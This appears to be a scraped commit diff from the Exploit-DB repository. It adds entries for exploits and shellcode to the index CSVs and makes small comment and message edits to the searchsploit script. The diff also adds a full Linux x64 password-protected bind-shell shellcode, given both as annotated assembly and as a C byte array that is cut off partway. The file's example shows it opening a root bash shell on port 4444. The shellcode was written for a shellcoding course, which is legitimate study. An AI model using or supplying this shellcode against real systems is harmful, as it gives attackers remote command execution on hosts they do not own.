48290,exploits/windows/dos/48290.py,"UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
48291,exploits/windows/dos/48291.py,"UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
48292,exploits/windows/dos/48292.txt,"ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)",2020-04-06,chuyreds,dos,windows,
48301,exploits/linux/dos/48301.py,"dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)",2020-04-07,JosueEncinar,dos,linux,
48302,exploits/windows/dos/48302.py,"ZOC Terminal 7.25.5 - 'Script' Denial of Service (PoC)",2020-04-07,chuyreds,dos,windows,
48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10101,7 +10112,7 @@ id,file,description,date,author,type,platform,port
40938,exploits/linux/local/40938.py,"RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection",2016-12-18,"Hacker Fantastic",local,linux,
40943,exploits/linux/local/40943.txt,"Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",local,linux,
40950,exploits/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation",2016-12-22,"Hector X. Monsegur",local,aix,
40953,exploits/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",local,linux,
40953,exploits/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Jaka Hudoklin",local,linux,
40956,exploits/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",local,macos,
40957,exploits/macos/local/40957.c,"Apple macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",local,macos,
40962,exploits/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",local,linux,
@ -11011,6 +11022,23 @@ id,file,description,date,author,type,platform,port
48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,
48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows,
48281,exploits/windows/local/48281.py,"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)",2020-04-03,Hodorsec,local,windows,
48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows,
48314,exploits/windows/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows,
48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows,
48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows,
48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos,
48339,exploits/windows/local/48339.py,"Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)",2020-04-17,"Bailey Belisario",local,windows,
48344,exploits/windows/local/48344.py,"Code Blocks 16.01 - Buffer Overflow (SEH) UNICODE",2020-04-17,T3jv1l,local,windows,
48346,exploits/windows/local/48346.py,"Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)",2020-04-20,boku,local,windows,
48350,exploits/windows/local/48350.py,"Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))",2020-04-20,Cervoise,local,windows,
48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows,
48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows,
48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18074,7 +18102,17 @@ id,file,description,date,author,type,platform,port
48273,exploits/multiple/remote/48273.rb,"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)",2020-03-31,Metasploit,remote,multiple,
48274,exploits/hardware/remote/48274.rb,"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)",2020-03-31,Metasploit,remote,hardware,
48275,exploits/windows/remote/48275.rb,"SharePoint Workflows - XOML Injection (Metasploit)",2020-03-31,Metasploit,remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
48331,exploits/linux_mips/remote/48331.rb,"TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,linux_mips,20002
48332,exploits/java/remote/48332.msf,"Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)",2020-04-16,Metasploit,remote,java,
48333,exploits/linux/remote/48333.rb,"ThinkPHP - Multiple PHP Injection RCEs (Metasploit)",2020-04-16,Metasploit,remote,linux,
48334,exploits/linux/remote/48334.rb,"Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,linux,
48335,exploits/php/remote/48335.rb,"PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)",2020-04-16,Metasploit,remote,php,
48336,exploits/windows/remote/48336.rb,"DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)",2020-04-16,Metasploit,remote,windows,
48338,exploits/multiple/remote/48338.rb,"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)",2020-04-16,Metasploit,remote,multiple,
48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux,
48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
53,exploits/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution",2003-07-10,knight420,webapps,cgi,
@ -42359,6 +42397,7 @@ id,file,description,date,author,type,platform,port
47893,exploits/hardware/webapps/47893.js,"Sony Playstation 4 (PS4) < 6.72 - WebKit Code Execution (PoC)",2019-12-31,"TJ Corley",webapps,hardware,
47895,exploits/java/webapps/47895.py,"Oracle Weblogic 10.3.6.0.0 - Remote Command Execution",2020-01-09,james,webapps,java,
47898,exploits/php/webapps/47898.py,"Pandora 7.0NG - Remote Code Execution",2020-01-10,Askar,webapps,php,
48368,exploits/php/webapps/48368.txt,"User Management System 2.0 - Persistent Cross-Site Scripting",2020-04-23,Besim,webapps,php,
47899,exploits/php/webapps/47899.py,"PixelStor 5000 K:4.0.1580-20150629 - Remote Code Execution",2020-01-10,.:UND3R:.,webapps,php,
47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,
47901,exploits/multiple/webapps/47901.sh,"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)",2020-01-11,"Project Zero India",webapps,multiple,
@ -42526,3 +42565,53 @@ id,file,description,date,author,type,platform,port
48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php,
48289,exploits/php/webapps/48289.txt,"LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,php,
48294,exploits/multiple/webapps/48294.rb,"Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)",2020-04-06,"Mehmet Ince",webapps,multiple,
48295,exploits/multiple/webapps/48295.txt,"WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting",2020-04-06,"Gal Weizman",webapps,multiple,
48296,exploits/php/webapps/48296.py,"Bolt CMS 3.7.0 - Authenticated Remote Code Execution",2020-04-06,r3m0t3nu11,webapps,php,
48297,exploits/php/webapps/48297.txt,"LimeSurvey 4.1.11 - 'File Manager' Path Traversal",2020-04-06,"Matthew Aberegg",webapps,php,
48300,exploits/freebsd/webapps/48300.txt,"pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting",2020-04-06,"Matthew Aberegg",webapps,freebsd,
48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php,
48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware,
48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,
48310,exploits/hardware/webapps/48310.txt,"Huawei HG630 2 Router - Authentication Bypass",2020-04-13,"Eslam Medhat",webapps,hardware,
48311,exploits/hardware/webapps/48311.py,"TVT NVMS 1000 - Directory Traversal",2020-04-13,"Mohin Paramasivam",webapps,hardware,
48312,exploits/php/webapps/48312.txt,"Webtateas 2.0 - Arbitrary File Read",2020-04-13,"China Banking and Insurance Information Technology Management Co.",webapps,php,
48313,exploits/java/webapps/48313.txt,"WSO2 3.1.0 - Arbitrary File Delete",2020-04-13,"Raki Ben Hamouda",webapps,java,
48315,exploits/php/webapps/48315.txt,"Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion",2020-04-13,"Daniel Monzón",webapps,php,
48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Noam Moshe",webapps,php,
48318,exploits/hardware/webapps/48318.txt,"Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution",2020-04-14,Wadeek,webapps,hardware,
48319,exploits/java/webapps/48319.txt,"WSO2 3.1.0 - Persistent Cross-Site Scripting",2020-04-14,"Raki Ben Hamouda",webapps,java,
48320,exploits/java/webapps/48320.py,"Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution",2020-04-14,nu11secur1ty,webapps,java,
48321,exploits/ios/webapps/48321.txt,"AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,ios,
48322,exploits/ios/webapps/48322.txt,"SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,ios,
48323,exploits/php/webapps/48323.txt,"Pinger 1.0 - Remote Code Execution",2020-04-15,"Milad karimi",webapps,php,
48324,exploits/php/webapps/48324.txt,"SeedDMS 5.1.18 - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,php,
48325,exploits/php/webapps/48325.txt,"Macs Framework 1.14f CMS - Persistent Cross-Site Scripting",2020-04-15,Vulnerability-Lab,webapps,php,
48326,exploits/php/webapps/48326.txt,"DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting",2020-04-15,"Vulnerability Research Laboratory",webapps,php,
48327,exploits/ios/webapps/48327.txt,"File Transfer iFamily 2.1 - Directory Traversal",2020-04-15,Vulnerability-Lab,webapps,ios,
48328,exploits/php/webapps/48328.txt,"Xeroneit Library Management System 3.0 - 'category' SQL Injection",2020-04-15,"Sohel Yousef",webapps,php,
48340,exploits/ios/webapps/48340.txt,"Playable 9.18 iOS - Persistent Cross-Site Scripting",2020-04-17,Vulnerability-Lab,webapps,ios,
48341,exploits/php/webapps/48341.txt,"TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection",2020-04-17,Vulnerability-Lab,webapps,php,
48342,exploits/hardware/webapps/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",webapps,hardware,
48345,exploits/php/webapps/48345.txt,"Centreon 19.10.5 - 'id' SQL Injection",2020-04-20,"Basim Alabdullah",webapps,php,
48348,exploits/php/webapps/48348.txt,"Fork CMS 5.8.0 - Persistent Cross-Site Scripting",2020-04-20,Vulnerability-Lab,webapps,php,
48354,exploits/php/webapps/48354.txt,"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting",2020-04-21,"Metin Yunus Kandemir",webapps,php,
48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php,
48357,exploits/php/webapps/48357.txt,"CSZ CMS 1.2.7 - 'title' HTML Injection",2020-04-21,"Metin Yunus Kandemir",webapps,php,
48358,exploits/hardware/webapps/48358.py,"IQrouter 3.3.1 Firmware - Remote Code Execution",2020-04-21,drakylar,webapps,hardware,
48360,exploits/json/webapps/48360.txt,"NSClient++ 0.5.2.35 - Authenticated Remote Code Execution",2020-04-21,kindredsec,webapps,json,
48361,exploits/php/webapps/48361.txt,"jizhi CMS 1.6.7 - Arbitrary File Download",2020-04-21,jizhicms,webapps,php,
48362,exploits/hardware/webapps/48362.txt,"P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)",2020-04-21,LiquidWorm,webapps,hardware,
48365,exploits/hardware/webapps/48365.txt,"Edimax EW-7438RPn - Information Disclosure (WiFi Password)",2020-04-22,Besim,webapps,hardware,
48366,exploits/hardware/webapps/48366.txt,"Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)",2020-04-22,Besim,webapps,hardware,
48367,exploits/linux/webapps/48367.txt,"Mahara 19.10.2 CMS - Persistent Cross-Site Scripting",2020-04-22,Vulnerability-Lab,webapps,linux,
48369,exploits/php/webapps/48369.txt,"User Management System 2.0 - Authentication Bypass",2020-04-23,Besim,webapps,php,
48370,exploits/php/webapps/48370.txt,"Complaint Management System 4.2 - Persistent Cross-Site Scripting",2020-04-23,Besim,webapps,php,
48371,exploits/php/webapps/48371.txt,"Complaint Management System 4.2 - Authentication Bypass",2020-04-23,Besim,webapps,php,
48372,exploits/php/webapps/48372.txt,"Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)",2020-04-23,Besim,webapps,php,
48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi,
48375,exploits/ios/webapps/48375.txt,"Sky File 2.1.0 iOS - Directory Traversal",2020-04-23,Vulnerability-Lab,webapps,ios,
48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,
48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware,
48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java,

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -1019,3 +1019,5 @@ id,file,description,date,author,type,platform
48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows
48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux
48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64
48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows
48379,shellcodes/linux/48379.c,"Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux

1 id file description date author type platform
1019 48229 shellcodes/windows/48229.txt Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) 2020-03-18 boku shellcode windows
1020 48243 shellcodes/linux/48243.txt Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes) 2020-03-23 Upayan shellcode linux
1021 48252 shellcodes/windows_x86-64/48252.txt Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes) 2020-03-25 boku shellcode windows_x86-64
1022 48355 shellcodes/windows/48355.c Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) 2020-04-21 boku shellcode windows
1023 48379 shellcodes/linux/48379.c Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes) 2020-04-24 boku shellcode linux

27
searchsploit
View file

@ -144,24 +144,24 @@ function update() {
path="${tmp_path[${i}]}"
package="${tmp_package[${i}]}"
# Update from the repos (e.g. Kali)
dpkg -l "${package}" 2>/dev/null >/dev/null
## Update from the repos (e.g. Kali)
apt-cache search "${package}" 2>/dev/null >/dev/null #dpkg -l "${package}" 2>/dev/null >/dev/null
if [[ "$?" == "0" ]]; then
updatedeb "${package}"
else
# Update from homebrew (e.g. OSX)
## Update from homebrew (e.g. OSX)
brew 2>/dev/null >/dev/null
if [[ "$?" == "0" ]]; then
# This only really only updates "./searchsploit". The rest (can) come via git as its updated more frequently
## This only really only updates "./searchsploit". The rest (can) come via git as its updated more frequently
updatedbrew "${package}"
fi
# Update via Git
## Update via Git
updategit "${package}" "${path}" "${git}"
fi
done
# Done
## Done
exit 6
}
@ -185,7 +185,7 @@ function updatedeb() {
function updatedbrew() {
package_in="${1}"
echo -e "[i] Updating via brew package management.\n"
echo -e "[i] Updating via brew package management\n"
brew update \
|| echo -e "\n[-] Issue with brew update (Please check network connectivity)" 1>&2
@ -328,14 +328,18 @@ function searchsploitout() {
## Are there too many results?
lines=$( echo -e "${out}" | wc -l )
if [[ "${lines}" -gt 100 ]]; then
echo -e "[-] Skipping output: ${tmp} (Too many results. Please re-search manually: $0 ${arg} ${tmp})\n" 1>&2
echo -e "[-] Skipping output: ${tmp} (Too many results, 100+. You'll need to force a search: $0 ${arg} ${tmp})\n" 1>&2
## Are there any results?
elif [[ "${lines}" -gt 5 ]]; then
echo -e "${out}\n\n"
## If there's no results
else
## Exit for loop
break
fi
## Space out for the next word
tmp="${tmp} "
done
## Padding between loops
@ -352,7 +356,7 @@ function searchsploitout() {
## Are there too many results?
lines=$( echo -e "${out}" | wc -l )
if [[ "${lines}" -gt 100 ]]; then
echo -e "[-] Skipping output: ${software} (Too many results. Please re-search manually: $0 ${arg} ${software})\n" 1>&2
echo -e "[-] Skipping output: ${software} (Too many results, 100+. You'll need to force a search: $0 ${arg} ${software})\n" 1>&2
## Are there any results?
elif [[ "${lines}" -gt 5 ]]; then
echo -e "${out}\n\n"
@ -390,6 +394,7 @@ function nmapxml() {
;;
"[PRODUCT]")
## We have a name, but no version (yet?) e.g. dnsmasq
echo "${software}"
software="${input}"
echo "${software}"
;;
@ -412,7 +417,8 @@ function buildterms() {
## If we are to use colour ("--colour"), add the values to search for between "or"
if [[ "${COLOUR}" -eq 1 ]]; then
[[ "${COLOUR_TAG}" ]] && COLOUR_TAG="${COLOUR_TAG}|"
[[ "${COLOUR_TAG}" ]] \
&& COLOUR_TAG="${COLOUR_TAG}|"
COLOUR_TAG="${COLOUR_TAG}${tag_in}"
fi
@ -645,6 +651,7 @@ function findresults() {
OUTPUT="$( echo "${OUTPUT}" \
| awk -F ',' '{ printf "%-'${FORMAT_COL1}'s | %.'${FORMAT_COL2}'s\n", $3, $2 }' \
| sort -f )"
#| sed 's_,exploits/_,_; s_,shellcodes/_,_; s_,papers/_,_' \
fi

194
shellcodes/linux/48379.c Normal file
View file

@ -0,0 +1,194 @@
## Exploit Title: Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)
## Exploit Author: Bobby Cooke
## Date: 2020-04-23
## Tested on: Linux x86_64 SMP Debian 5.3.15-1kali1
## SLAE/Student ID: PA-10913
## Course: This shellcode was created for the x86_64 Assembly Language and Shellcoding on Linux (SLAE64) Course offered at pentesteracademy.com.
## Description: Dynamic, Null-free shellcode that spawns a bindshell on TCP port 4444; on all the network interfaces of the host. The bindshell is password protected. The password 'P3WP3Wl4ZerZ' must be entered before execve will spawn a bash shell for the connecting client.
## Example:
# user$ nc 127.0.0.1 4444
# M@G1C WOrDz IZ??asd
# REALLY?!M@G1C WOrDz IZ??P3WP3Wl4ZerZ
# id
# uid=0(root) gid=0(root) groups=0(root)
; int ipv4Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
; rax = 0x29 ; rdi = 0x2 = AF_INET
; rsi = 0x1 = SOCK_STREAM ; rdx = 0x0 = IPPROTO_IP
xor rsi, rsi ; clear rsi
mul rsi ; clear rax, rdx ; rdx = 0x0 = IPPROTO_IP
add al, 0x29 ; rax = 0x29 = socket syscall
inc rsi ; rsi = 0x1 = SOCK_STREAM
push rsi
pop rdi ; rdi = 0x1
inc rdi ; rdi = 0x2 = AF_INET
syscall ; socket syscall ; RAX returns socket File-Descriptor
; bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
; rax = 0x31 ; rdi = 0x3 = ipv4Socket
; rsi = &ipSocketAddr ; rdi = 0x10
; 02 00 11 5c 00 00 00 00 00 00 00 00 00 00 00 00
; Address-Family| PORT| IP Address| 8 bytes of zeros
xchg rdi, rax ; RDI = sockfd / ipv4Socket
xor rax, rax
add al, 0x31 ; rax = 0x31 = socket syscall
push rdx ; 8 bytes of zeros for second half of struct
push dx ; 4 bytes of zeros for IPADDR_ANY
push dx ; 4 bytes of zeros for IPADDR_ANY
push word 0x5c11 ; push 2 bytes for TCP Port 4444
inc rdx
inc rdx ; rdx = 0x2 ; dx = 0x0002
push dx ; 0x2 = AF_INET
add dl, 0xe ; rdi = 0x10 = sizeof(ipSocketAddr)
mov rsi, rsp ; rsi = &ipSocketAddr
syscall
; int listen(int sockfd, int backlog);
; rax = 0x32 = listen syscall
; rdi = sockfd = 0x3 = ipv4Socket ; rsi = backlog = 0
xor rax, rax
add al, 0x32 ; listen syscall
xor rsi, rsi ; backlog = 0x0
syscall
;accept
; rax = 0x2b ; rdi = sockfd = 0x3 = ipv4Socket
; rsi = 0x0 ; rdx = 0x0
xor rax, rax
push rax
push rax
pop rdx
pop rsi
add al, 0x2b ; accept syscall
syscall ; accept returns client socket file-descriptor in RAX
; dup2
xchg rdi, rax ; RDI = sockfd / ClientSocketFD
xor rsi, rsi
add dl, 0x3 ; Loop Counter
dup2Loop:
xor rax, rax
add al, 0x21 ; RAX = 0x21 = dup2 systemcall
syscall ; call dup2 x3 to redirect STDIN STDOUT STDERR
inc rsi
cmp rsi, rdx ; if 2-STDERR, end loop
jne dup2Loop
jmp short password
failer:
; write
; rax = 0x1 ; rdi = fd = 0x1 STDOUT
; rsi = &String ; rdx = sizeof(String)
; String = "REALLY?!"
; !?YLLAER : 213f594c4c414552
xor rdi, rdi
mul rdi
push rdi
pop rsi
push rsi
mov rsi, 0x213f594c4c414552
push rsi
mov rsi, rsp ; rsi = &String
inc rax ; rax = 0x1 = write system call
mov rdi, rax
add rdx, 16 ; 16 bytes / size of string
syscall
password:
; write
; rax = 0x1 ; rdi = fd = 0x1 STDOUT
; rsi = &String ; rdx = sizeof(String)
; String = "M@G1C WOrDz IZ??"
; ??ZI zDr : 3f3f5a49207a4472
; OW C1G@M : 4f5720433147404d
xor rdi, rdi
mul rdi
push rdi
pop rsi
push rsi
mov rsi, 0x3f3f5a49207a4472 ; ??ZI zDr
push rsi
mov rsi, 0x4f5720433147404d ; OW C1G@M
push rsi
mov rsi, rsp ; rsi = &String
inc rax ; rax = 0x1 = write system call
mov rdi, rax
add rdx, 16 ; 16 bytes / size of string
syscall
; read
; rax = 0x0 = read syscall ; rdi = fd = 0x0 STDIN
; rsi = Write to &String ; rdx = 0x12 = sizeof(String)
xor rdi, rdi
push rdi
mul rdi ; rdx =0x0 ; rax = 0x0 = write system call
mov rsi, rsp ; rsi = [RSP] = &String
add rdx, 12 ; 12 bytes / size of password
syscall
; String = P3WP3Wl4ZerZ
; ZreZ : 5a72655a
; 4lW3PW3P : 346c573350573350
mov rdi, rsp
xor rsi, rsi
add rsi, 0x5a72655a
push rsi
mov rsi, 0x346c573350573350
push rsi
mov rsi, rsp ; rsi = &String
xor rcx, rcx
add rcx, 0xB
repe cmpsb
jnz failer
;execve
; rax = 0x3b ; rdi = Pointer -> "/bin/bash"0x00
; rsi = 0x0 ; rdx = 0x0
; "/bin/bash"
; h : 68
; sab/nib/ : 7361622f6e69622f
xor rsi, rsi
mul rsi ; rdx&rax= 0x0
xor rdi, rdi
push rdi
add rdx, 0x68 ; "h"
push rdx
mov rdx, 0x7361622f6e69622f ; "/bin/bas"
push rdx
xor rdx, rdx
mov rdi, rsp
mov al, 0x3b ; execve syscall
syscall ; call execve("/bin/bash", NULL, NULL)
################################################################################
// Filename: shellcode.c
// Compile: gcc -m64 -z execstack -fno-stack-protector shellcode.c -o shellcode
#include <stdio.h>
#include <string.h>
unsigned char shellcode[] = \
"\x48\x31\xf6\x48\xf7\xe6\x04\x29\x48\xff\xc6\x56\x5f\x48\xff\xc7"
"\x0f\x05\x48\x97\x48\x31\xc0\x04\x31\x52\x66\x52\x66\x52\x66\x68"
"\x11\x5c\x48\xff\xc2\x48\xff\xc2\x66\x52\x80\xc2\x0e\x48\x89\xe6"
"\x0f\x05\x48\x31\xc0\x04\x32\x48\x31\xf6\x0f\x05\x48\x31\xc0\x50"
"\x50\x5a\x5e\x04\x2b\x0f\x05\x48\x97\x48\x31\xf6\x80\xc2\x03\x48"
"\x31\xc0\x04\x21\x0f\x05\x48\xff\xc6\x48\x39\xd6\x75\xf1\xeb\x23"
"\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x52\x45\x41\x4c\x4c"
"\x59\x3f\x21\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2"
"\x10\x0f\x05\x48\x31\xff\x48\xf7\xe7\x57\x5e\x56\x48\xbe\x72\x44"
"\x7a\x20\x49\x5a\x3f\x3f\x56\x48\xbe\x4d\x40\x47\x31\x43\x20\x57"
"\x4f\x56\x48\x89\xe6\x48\xff\xc0\x48\x89\xc7\x48\x83\xc2\x10\x0f"
"\x05\x48\x31\xff\x57\x48\xf7\xe7\x48\x89\xe6\x48\x83\xc2\x0c\x0f"
"\x05\x48\x89\xe7\x48\x31\xf6\x48\x81\xc6\x5a\x65\x72\x5a\x56\x48"
"\xbe\x50\x33\x57\x50\x33\x57\x6c\x34\x56\x48\x89\xe6\x48\x31\xc9"
